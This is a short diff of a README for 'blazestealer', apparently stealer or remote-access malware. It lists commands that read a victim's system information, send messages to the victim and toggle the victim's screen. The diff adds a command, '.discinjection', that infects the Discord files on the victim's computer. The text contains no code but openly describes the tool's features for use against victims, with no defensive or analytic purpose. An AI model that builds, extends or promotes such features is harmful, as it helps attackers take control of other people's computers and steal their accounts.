BlazeSquad666/blazestealer/README.md

 .sysinfo: Obtain victim's operating system information.
 .infomsg: Sends the user an informative message.
 .questionmsg: Sends the user a question message.
+.discinjection: Infect's the Discord Files on the victim's computer.
 .screentroll: Turns the victim's screen on and off without stopping.
 .screenon: Turn on the victim's screen.
 .screenoff: Turn off the victim's screen.